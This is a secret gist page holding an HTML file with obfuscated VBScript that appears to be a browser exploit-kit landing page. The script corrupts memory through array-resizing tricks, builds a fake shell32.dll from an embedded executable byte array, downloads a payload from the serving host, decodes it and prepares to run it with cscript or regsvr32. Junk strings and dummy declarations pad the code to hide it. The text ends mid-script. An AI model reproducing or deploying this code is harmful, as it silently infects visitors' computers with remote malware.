Create a gist now

Instantly share code, notes, and snippets.

anonymous /grandsoft.html Secret
Created Feb 11, 2018

Embed
What would you like to do?
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html lang="en" dir="ltr"><head><meta http-equiv="X-UA-Compatible" content="IE=10"><meta charset="UTF-8"></head><body><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" dir="ltr">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=10">
<meta charset="UTF-8">
</head>
<body>
<script type="text/vbscript">
Dim E8zETlmD0
z9TmaQnrKIX = "Set t7BdKL = New Q6dZEWZ End Function End Function "
Dim Q0GzfxxyDx2
Dim aw
Dim y3nqRLwHqzDV3
Dim lunnga(32)
Dim k4AHwgfkJC4
Dim y(32)
H9lfMedUI = "Private Sub Class B0qaKTR Set t6MywxEi = Nothing While Not s3UWpceU.U8petP "
k1 = 1
Dim K1LeexnC6
k2 = 1999 + k1
Dim d3FPpULUysBF7
fix1 = "%u4141"
X6NpgCFlDDE = " H5uJB = H9OQWxe & Trim(h8pddOe.r6dmL()) End Function "
fastfix = fix1 & fix1
Dim h4FZbTPskxhH9
k3 = 32
o8DdinMtr = "If Len(g9JilT.p1fyMc) > 0 Then "
fix3 = fastfix & fix1
Dim Q4vGaxOPXH11
zerofix = "%u0000"
Dim W5eKMuPAb12
trifix = zerofix & zerofix & zerofix
S2GqIccoA = "Private Sub Class i3BEzt Set I2xkUv = New T0AFeFDG "
d = fastfix & "%u0016" & fix3 & "%u4242%u4242"
Dim T5aHvtHn14
b = String(k2*k3, "D")
b0DfwseSOn = "Private Sub Class m1OLAOg While Not W4iMasWX.T2ILGBT End Function "
c = d & b
O4lfOecUfNuW = " n5VTUkhX = T0ZksL & Trim(B2UPguZS.J0uaIXp()) Function M2Zwarl(D2fXTA, p4EKFQ While Not B0CJdwIQ.s7Pro "
x = UnEscape(c)
Dim O6whmZToV17
Dim b9eKZkrJqufG18
Class MiddleD
End Class
Dim A9nXTgeymaO20
Dim w7MUHHWHAxsM21
Class Wararape
Dim Cod()
Private Sub Class_Initialize
ReDim Preserve Cod(k1, k2)
End Sub
Dim m9iHABRsK26
Public Sub ZeroineL()
Dim J7NVaIXtd28
ReDim Preserve Cod(k1, k1)
Dim F8avMghNoACd29
End Sub
End Class
Dim K2iSkQyQApC31
Dim x6hmfIQI32
Function GogoGoA (arg1, s)
Dim o7NJSRTPiJs33
aw = Null
E9nflWJEJC = "While Not O5bWG.k1lOB "
Set aw = New Wararape
I2qBUWShB = "Set O6zDkG = New c8DbmPE "
q7wtnUXJB = "Set Q5LUWQ = New g9DWwgi End Sub "
For i = 0 To k3
Dim E3fTrAOhcDR37
Set lunnga(i) = s
Dim M1beJSlB38
Next
Dim H0QFkKpxGt39
H0DmPmMpCPTM = "If Len(m5rKML.c3WeZrLW) > 0 Then "
Set aw.Cod(arg1, 2) = s
Dim r7RPvtdbfGqZ41
Dim O5GeEOcPLEdf42
Dim addr
B5fmPdttw = "Set b3eHMK = Nothing "
Dim i
Dim L7Iiypaz44
For i = 0 To k3-1
Dim J1cPpQIOb45
If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
Dim q8rJBpKm46
addr = strToInt(Mid(y(i), 3 + 4, 2))
Dim g3OBiOzchgw47
End If
Dim x3cFXdxTuN48
y(i) = Null
Dim c8BirmdBwAqP49
Next
Dim g6KsPGzw50
Dim J1NdnamyXmkz51
If addr = Null Then
O4QLmrvRGA = " e6NqbtgS = v8ngHnui & Trim(X5BKph.w5WxwycJ()) For Each x0pQKmsi In b7tWJ "
document.location.href = document.location.href
Dim r9CrWVKa53
Return
Dim C4XIBFWfff54
End If
Dim z3ZxJOWBNyy55
O7RyoURBu = "Private Sub Class y0IFMT H7EOd = F0ZtlO & Trim(D2dCLM.a8mMU()) "
GogoGoA = addr
Dim D2uDQRRs57
End Function
Dim H1ryJhJXzK58
Dim c6MoSshgcT59
Function LikeMeLike (arg1, addr)
Dim y2ahocdQktX60
d = fastfix & "%u0008" & fix3
v6KnvrwiTAg = "End Function "
c = d & intToStr(addr) & b
Dim r9HTLEWs62
x = UnEscape(c)
Dim z4cfvQyzwRT63
aw = Null
Dim s3QBLvGE64
Set aw = New Wararape
Dim O0iOLSch65
Dim o
E3nxDoQuXUa = "While Not V1tnLqQ.w6kNgPhO "
o = aw.Cod(arg1, 2)
B8XhUKdo = "Sub W8zfEx p6AtU = v2QDXp & Trim(A3imrI.b1rrcfeZ()) Function g7bGfDda(M9fuS, g6PTsLNL "
LikeMeLike = o
I4MGtHNRnMTy = "Sub C7TeVTW Function k6BTvAHN(T5OTuarP, R4VzUBZz "
End Function
Dim J7GwVgFF69
J7DPnTWAC = "For Each L8TAsO In A6qdtCqR Set b7VWQXID = Nothing "
Sub Rewwati (arg1, addr)
Dim r0srzeFKds71
d = fastfix & "%u400C" & trifix
Dim K6iFClTwfT72
c = d & intToStr(addr) & b
Dim n6daSwfyN73
x = UnEscape(c)
Dim I9bCSdBcylmN74
aw = Null
H4SNGyibHUB = "While Not r8OcGn.f8sWK Function w6WPmTgP(P6PMSAT, D1ncRMxD "
Set aw = New Wararape
m4fzEDdp = "Function i5kry(r7qWIBd, H1TTvcZM "
aw.Cod(arg1, 2) = CSng(0)
Dim V0VnXUlPLrWz77
End Sub
Dim h0DirPmzMLwK78
Dim e1tXyGOaZbd79
Sub Rewwati2 (arg1, addr)
F6GGCOmOsaXE = "End Sub Set F6Bod = New U9Gxbs "
Dim emptyval
m6qNLmmo = "Function G4QqVE(W8FWwmO, I4GnW Set N8uHXP = New T8nvyav Set h1Caq = Nothing "
d = fastfix & "%u400C" & trifix
Dim R4mXvTNWdmBT82
c = d & intToStr(addr) & b
Dim U0GVHlVTZHN83
x = UnEscape(c)
Dim k1BIoAiIHTT84
aw = Null
l9hvIFNAV = "End Function If Len(l9vKS.x5ZKRA) > 0 Then For Each D9COKrvK In W2TVUfsM "
Set aw = New Wararape
Dim H2ghIrSB86
aw.Cod(arg1, 2) = emptyval
Dim A4EIPfURd87
End Sub
Dim t8VEyOzT88
Dim I1lMKnmEiHpe89
Function ProtectMe (arg1)
Dim o4fpMHffuXwx90
Dim addr
Dim J6fcGaffeho91
Dim sexy
Dim T4bMGofGEu92
Dim koles
Dim H1IfaFoRvB93
Dim mem
Dim g0qcFyTau94
Set dm = New MiddleD
Dim i1sIrVecnN95
addr = GogoGoA(arg1, dm)
Dim T3wqQKwdnu96
mem = LikeMeLike(arg1, addr + 8)
X1pIkwQeE = "For Each p0PRFoE In S5pcOs "
sexy = strToInt(Mid(mem, 3, 2))
Dim b5dmZEXpTF98
mem = LikeMeLike(arg1, sexy + 4)
Dim M3psPdOSLBn99
koles = strToInt(Mid(mem, 1, 2))
G8ONCdHe = "While Not d4UJqai.Q6QZa x5BmFIfd = h8TwwBK & Trim(S5ZPiE.H1OtPe()) q7PzoP = X6Cda & Trim(w2knTGHQ.N5yXxJ()) "
Rewwati arg1, koles + &H174
Dim S2ctXXGT101
fire()
V4xbyDQMsM = " M6Xsi = o9snnQBs & Trim(C0twTvf.b8vfs()) "
Rewwati2 arg1, koles + &H174
Dim a5DpmvDbrgn103
End Function
Dim G2InbTVFv104
B0JKInwD = "End Sub Private Sub Class k6DqwD Sub y8NfNcV "
K4CTdWZqgGb = "Set s9QPOgSe = New h8FWv If Len(w1AEQhn.K2ReLd) > 0 Then Set l9dXTZhw = Nothing "
L9MVxGOU = "Set h1Clx = Nothing "
Dim a3cTxUJqaHPv108
Dim n0GKwMAw109
Dim K9ipNnlqC110
Sub fire()
Dim S4ZDhJkoO111
On Error Resume Next
s0XEcrRbapH = " J5XwGe = w4Jturov & Trim(t0pMROl.x9ZWcArw()) End Sub "
Dim V2sIUTScGu113
V6xMvTIWJKSD = " S8ZeyHiO = s0dChE & Trim(a0NWTDPS.l7TrGf()) If Len(k0ilwou.t0FtWcCx) > 0 Then End Function "
Dim max,min
Dim g2QHTGrAU115
max=9000
Dim z0OMHTXST116
min=100
E6WPDCnJfAug = "Function L8VQS(F5SNiw, u7oxWOT Private Sub Class S3pnvNAT "
Randomize
o7dqxREp = "End Function "
keyRand = Int((max-min+1)*Rnd+min)
Dim N1CWElptI119
Dim D5TPTPAlkO120
locationUrl = "http://" & window.location.hostname
Dim G7tAfQRW121
url = locationUrl & "/2/" & keyRand
Dim p1zBhBPNe122
k2CsdthGw = "End Sub "
Dim f4WmbCxuEUtQ124
Dim O5ezIpyIuAS125
Set oss=GetObject("winmgmts:").InstancesOf("Win32_OperatingSystem")
e9HitQSXtcR = "While Not u3RQbbur.X4EBusM "
Dim osloc
Dim R0AiyXKM127
for each os in oss
Dim H4ANpSHw128
osloc=os.OSLanguage
g8GtztyGaH = " W3LTarwJ = L6ssqxd & Trim(M1vaF.B8TGG()) "
next
Dim J3WLHIGEKvhi130
SetLocale(osloc)
Dim O2bxLLzS131
Dim e4vCSvIBe132
Dim K4Lizexy133
Dim y7MPSVbwJik134
Dim M3ZrmPIrQP135
Dim R9xTIwuKMT136
Set req=CreateObject("WinHTTP.WinHTTPRequest.5.1")
Dim x6zhTlRRHz137
req.SetProxy 0
Dim a5ZTQJQGXAfG138
req.Open "GET",url,0
w5EJOIZolh = "Sub A5EAHgLB "
req.Send
Dim F4XBlwSkn140
If 200=req.status Then
Dim q8gXdSKk141
z=req.responseBody
Dim F1AfIOfVzGAA142
Dim s5iEdVSfLkm143
Dim n1nccNnmaOs144
Dim q8gMDtiGXoQe145
Dim O1opgqhZ146
Dim G4FghBCk147
Set c=CreateObject("Scripting.FileSystemObject")
Dim k1xORHBxKrf148
tmp=c.GetSpecialFolder(2)
U6vERFxx = "Set o6MbgH = New P7oEfsR "
fake32=tmp&"\\System32"
Dim O3pGgBOLtHC150
W6wvGCbpN = "End Sub For Each K9fnLK In M8biwOL "
If Not c.FolderExists(fake32) Then
Dim I9bbOdBwR152
c.CreateFolder(fake32)
Dim R5WPQZPQuKN153
End If
Dim B0hwCkOPoTg154
Dim dllcode,dlltxt,fakedll
Dim k9XSUAARayN155
dllcode= Array(&h4d,&h5a,&h80,0,&h1,0,0,0,&h4,0,&h10,0,&hff,&hff,0,0,&h40,&h1,0,0,0,0,0,0,&h40,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h80,0,0,0,&he,&h1f,&hba,&he,0,&hb4,&h9,&hcd,&h21,&hb8,&h1,&h4c,&hcd,&h21,&h54,&h68,&h69,&h73,&h20,&h70,&h72,&h6f,&h67,&h72,&h61,&h6d,&h20,&h63,&h61,&h6e,&h6e,&h6f,&h74,&h20,&h62,&h65,&h20,&h72,&h75,&h6e,&h20,&h69,&h6e,&h20,&h44,&h4f,&h53,&h20,&h6d,&h6f,&h64,&h65,&h2e,&hd,&ha,&h24,0,0,0,0,0,0,0,0,&h50,&h45,0,0,&h4c,&h1,&h4,0,&hb5,&h5a,&h50,&h5a,0,0,0,0,0,0,0,0,&he0,0,&he,&h21,&hb,&h1,&h1,&h45,0,&h2,0,0,0,&h6,0,0,0,0,0,0,0,&h20,0,0,0,&h20,0,0,0,&h10,0,0,0,0,&h40,0,0,&h10,0,0,0,&h2,0,0,&h1,0,0,0,0,0,0,0,&h4,0,0,0,0,0,0,0,0,&h50,0,0,0,&h4,0,0,&h26,&ha0,0,0,&h2,0,&h40,0,0,&h10,0,0,0,&h10,0,0,0,0,&h1,0,0,0,0,0,0,0,0,0,&h10,0,0,0,0,0,0,0,0,0,0,0,0,&h30,0,0,&he8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h40,0,0,&h50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h2e,&h64,&h61,&h74,&h61,0,0,0,&h86,&h1,0,0,0,&h10,0,0,0,&h2,0,0,0,&h4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h40,0,0,&hc0,&h2e,&h74,&h65,&h78,&h74,0,0,0,&h32,&h1,0,0,0,&h20,0,0,0,&h2,0,0,0,&h6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h20,0,0,&h60,&h2e,&h69,&h64,&h61,&h74,&h61,0,0,&he8,0,0,0,0,&h30,0,0,0,&h2,0,0,0,&h8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h40,0,0,&hc0,&h2e,&h72,&h65,&h6c,&h6f,&h63,0,0,&h50,0,0,0,0,&h40,0,0,0,&h2,0,0,0,&ha,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h40,0,0,&h42,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h61,&h73,&h20,&h61,&h73,&h6a,&h6b,&h20,&h64,&h61,&h6b,&h6a,&h64,&h66,&h6e,&h64,&h66,&h6e,&h6f,&h70,&h73,&h20,&h64,&h66,&h20,&h33,&h20,&h34,&h20,&h35,&h33,&h20,&h79,&h20,&h68,&h67,&h20,&h67,&h73,&h20,&h61,&h20,&h41,&h44,&h20,&h20,&h44,&h20,&h53,&h47,&h46,&h20,&h20,&h47,&h20,&h44,&h20,&h44,&h73,&h73,&h73,&h73,&h73,&h73,&h73,&h73,&h73,&h73,&h73,&h61,&h61,&h61,0,&h43,&h72,&h65,&h61,&h74,&h65,&h50,&h72,&h6f,&h63,&h65,&h73,&h73,&h41,&h73,&h55,&h73,&h65,&h72,&h57,0,&h4b,&h45,&h52,&h4e,&h45,&h4c,&h33,&h32,&h2e,&h44,&h4c,&h4c,0,&hbb,&hd8,&h8b,&h8c,&h8c,&hdf,&hdf,&hde,&h8d,&h96,&h8d,&h88,&h8d,&h8f,&h96,&h8f,&h8f,&h8a,&h82,&h96,&hda,&hd8,&hdf,&h89,&h96,&hd9,&h83,&h8e,&h8b,&h8e,&h83,&h8a,&hd9,&h83,&hdd,&h8d,&h8f,&hbb,&he8,&hc2,&hc8,&hcf,&hde,&hd6,&he9,&hd4,&hd4,&hcf,&hbb,&hd8,&hbc,&hd0,&hbe,&hdb,&hc0,&hef,&hc2,&ha6,&hc4,&hbd,&hc6,&ha2,&hc8,&he9,&hca,&he4,&hcc,&hae,&hce,&hef,&hd0,&ha2,&hd2,&ha7,&hd4,&hb4,&hd6,&ha5,&hd8,&had,&hda,&hfb,&hdc,&hf8,&hde,&h8c,&he0,&h98,&he2,&h90,&he4,&ha3,&he6,&h8e,&he8,&h85,&hea,&h8e,&hec,&h83,&hee,&h8e,&hf0,&h9c,&hf2,&h96,&hf4,&hd0,&hf6,&hd7,&hf8,&hdf,&hfa,&hdb,&hfc,&h8f,&hfe,&h9b,0,&h21,&h2,&h2c,&h4,&h76,&h6,&h27,&h8,&h26,&ha,&h7a,&hc,&h2d,&he,&h5c,&h10,&h68,&h12,&h60,&h14,&h61,&h16,&h72,&h18,&h74,&h1a,&h28,&h1c,&h2f,&h1e,&h1f,&h20,&h21,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h55,&h89,&he5,&h90,&h83,&h7d,&hc,&h1,&hf,&h85,&h1b,&h1,0,0,&ha3,&h83,&h10,&h40,0,&h90,&ha3,&h87,&h10,&h40,0,&h6a,&h1,&h58,&ha3,&h83,&h10,&h40,0,&h90,&ha3,&h87,&h10,&h40,0,&h6a,&h1,&h58,&h8b,&h15,&hee,&h10,&h40,0,&h31,&hc9,&h30,&h91,&hef,&h10,&h40,0,&h83,&hc1,&h1,&h83,&hf9,&h30,&h75,&hf2,&h31,&hc9,&h30,&h91,&h1f,&h11,&h40,0,&h80,&hc2,&h1,&h83,&hc1,&h1,&h83,&hf9,&h67,&h75,&hef,&ha3,&h83,&h10,&h40,0,&h90,&ha3,&h87,&h10,&h40,0,&h6a,&h1,&h58,&ha3,&h83,&h10,&h40,0,&h90,&ha3,&h87,&h10,&h40,0,&h6a,&h1,&h58,&h68,&hef,&h10,&h40,0,&h6a,&h1,&h6a,&h1,&h6a,0,&hff,&h15,&h54,&h30,&h40,0,&hff,&h15,&h58,&h30,&h40,0,&h85,&hc0,&hf,&h85,&h9b,0,0,0,&h66,&hc7,&h5,0,&h10,&h40,0,&h44,0,&h66,&hc7,&h5,&h2a,&h10,&h40,0,&h1,&h1,&h68,&h4,&h1,0,0,&h68,&h5d,&h10,&h40,0,&hff,&h15,&h64,&h30,&h40,0,&h68,&h5d,&h10,&h40,0,&h68,&h14,&h11,&h40,0,&hff,&h15,&h68,&h30,&h40,0,&h68,&he1,&h10,&h40,0,&hff,&h15,&h5c,&h30,&h40,0,&ha3,&he1,&h10,&h40,0,&h68,&hcc,&h10,&h40,0,&hff,&h35,&he1,&h10,&h40,0,&hff,&h15,&h60,&h30,&h40,0,&ha3,&he1,&h10,&h40,0,&ha3,&h83,&h10,&h40,0,&h90,&ha3,&h87,&h10,&h40,0,&h6a,&h1,&h58,&ha3,&h83,&h10,&h40,0,&h90,&ha3,&h87,&h10,&h40,0,&h6a,&h1,&h58,&h68,&h2a,&h10,&h40,0,&h68,0,&h10,&h40,0,&h6a,0,&h6a,0,&h6a,0,&h6a,0,&h6a,0,&h6a,0,&h68,&h1f,&h11,&h40,0,&h6a,0,&h6a,0,&hff,&h15,&he1,&h10,&h40,0,&h90,&h90,&hb8,&h1,0,0,0,&hc9,&hc2,&hc,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h38,&h30,0,0,0,0,0,0,0,0,0,0,&h28,&h30,0,0,&h54,&h30,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h4b,&h45,&h52,&h4e,&h45,&h4c,&h33,&h32,&h2e,&h44,&h4c,&h4c,0,0,0,0,&h70,&h30,0,0,&h80,&h30,0,0,&h90,&h30,0,0,&ha4,&h30,0,0,&hb6,&h30,0,0,&hce,&h30,0,0,0,0,0,0,&h70,&h30,0,0,&h80,&h30,0,0,&h90,&h30,0,0,&ha4,&h30,0,0,&hb6,&h30,0,0,&hce,&h30,0,0,0,0,0,0,0,0,&h43,&h72,&h65,&h61,&h74,&h65,&h45,&h76,&h65,&h6e,&h74,&h41,0,0,0,0,&h47,&h65,&h74,&h4c,&h61,&h73,&h74,&h45,&h72,&h72,&h6f,&h72,0,0,0,0,&h47,&h65,&h74,&h4d,&h6f,&h64,&h75,&h6c,&h65,&h48,&h61,&h6e,&h64,&h6c,&h65,&h41,0,0,0,0,&h47,&h65,&h74,&h50,&h72,&h6f,&h63,&h41,&h64,&h64,&h72,&h65,&h73,&h73,0,0,0,0,&h47,&h65,&h74,&h57,&h69,&h6e,&h64,&h6f,&h77,&h73,&h44,&h69,&h72,&h65,&h63,&h74,&h6f,&h72,&h79,&h41,0,0,0,0,&h53,&h65,&h74,&h45,&h6e,&h76,&h69,&h72,&h6f,&h6e,&h6d,&h65,&h6e,&h74,&h56,&h61,&h72,&h69,&h61,&h62,&h6c,&h65,&h41,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h20,0,0,&h50,0,0,0,&hf,&h30,&h15,&h30,&h1d,&h30,&h23,&h30,&h2c,&h30,&h34,&h30,&h44,&h30,&h54,&h30,&h5a,&h30,&h62,&h30,&h68,&h30,&h70,&h30,&h7c,&h30,&h82,&h30,&h91,&h30,&h9a,&h30,&ha6,&h30,&hac,&h30,&hb1,&h30,&hb6,&h30,&hbc,&h30,&hc1,&h30,&hc7,&h30,&hcc,&h30,&hd1,&h30,&hd7,&h30,&hdd,&h30,&he2,&h30,&he7,&h30,&hed,&h30,&hf5,&h30,&hfb,&h30,&h3,&h31,&h8,&h31,&h19,&h31,&h23,&h31,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0)
Dim T7qAvVNeD156
For i=0 to Ubound(dllCode)
Dim N9TVAuyER157
dllCode(i) = Chr(dllCode(i))
Dim e3zvyuhc158
Next
Dim P6fhcnWhTOJu159
dlltxt = Join(dllcode,"")
Dim d9suvwfe160
fakedll = c.BuildPath(fake32,"shell32.dll")
a1VPNmrI = "Private Sub Class z7QowlP For Each g2uDStzg In D4xHFX End Function "
Set b=c.CreateTextFile(fakedll)
f0DGDcSGO = "While Not z1KulE.D9IbMUT Set t3ZyT = Nothing "
b.Write dlltxt
Dim e6mNJGRmhMuk163
b.Close
Dim f1sBQXXa164
Dim q0atuVvgkJyZ165
u2ObkWfzNau = "End Sub "
E7LuudfxwFCi = "If Len(B9ZVBOM.F1tpdKC) > 0 Then Set W2xrrVoX = Nothing "
U5rHxDaz = "If Len(T6mrbqm.O0eRL) > 0 Then Private Sub Class B3fgso If Len(e0SoZ.L0hST) > 0 Then "
Dim u8uoTqrLhMPW169
ContenDisposition = req.GetResponseHeader("Content-Disposition")
Dim z6uXEIWv170
V9lNDUbrdq = "Set o5xunM = Nothing End Function "
str = ContenDisposition
Dim T9DHekaJwTHd172
regExp = "filename="
Dim V2XodSmcLU173
res = InStr(str, regExp)
Dim h8EMdTGlebP174
startStr = res + 10
Dim d8LaCCFm175
filename = Mid(str,startStr)
z5arBdMPhICl = " T5aqwk = q0BpE & Trim(a6uLcN.L6WtJl()) Private Sub Class A2dTAoo "
filenameLen = Len(filename)
Dim s8eayhgkK177
filename = Mid(filename ,1, filenameLen-1)
Dim v2OAqGlm178
X5rzLCkM = "Set D1ngD = New a2bXTW Private Sub Class B9RCx B0Bzu = w6macE & Trim(o9sSea.X2PdTdNq()) "
Dim L0upGOQVMBq180
if InStr(filename,".js")<>0 Then
Dim T4QWfAtCT181
cmdRun = "cscript "
Dim F5LCltwto182
elseif InStr(filename,".vbs")<>0 Then
Dim w6zTNqfJkU183
cmdRun = "cscript "
Dim x4HwlxcOSpEi184
elseif InStr(filename,".dll")<>0 Then
p1PkseLcyQ = "If Len(O8rQC.w0eBDHx) > 0 Then x9ULJ = g9tyiCK & Trim(V8txUFa.T3CRuA()) Private Sub Class N9SqGr "
cmdRun = "regsvr32 -s "
I1ygBrsTrmQ = "End Sub If Len(k8FOHCeO.h5AgLrk) > 0 Then l0gdDrRK = T1JSmpm & Trim(u0xyRv.A1XOP()) "
else
G5fOXlnx = "Private Sub Class M4fJcBvh Set P0obqe = Nothing For Each v4Jhp In b1LTB "
cmdRun = ""
Dim b0WqRHcwxG188
end if
Dim p2nAoEDKLx189
Dim M1ExKkFhL190
Dim g7VTtKhxdUEk191
Dim f1HtxkTul192
fullPath=c.BuildPath(tmp,filename)
Dim z7bFdHLKD193
Set stream=CreateObject("ADODB.Stream")
Dim R5iBHTorEoo194
stream.Open
Dim g6RyPmJQ195
stream.Type=1
Dim l9VREzyZn196
stream.Write z
Dim A5CUfrObTx197
arcnsave stream,keyRand,fullPath
Dim C0rXpkaqod198
stream.Close
Dim l4QiZwGN199
Dim w1PTKgWpiFVT200
c4DNdIkTvf = "While Not V6EDO.O1GAlXW Sub I3OpD "
Dim D5bVbHMNKkKT202
Set w=CreateObject("WScript.Shell")
w.Sleep 1000
Dim k3qthCBRPCs203
w.CurrentDirectory=tmp
M4XqkNsXVr = "End Sub For Each I5AFbv In z8bxMSO "
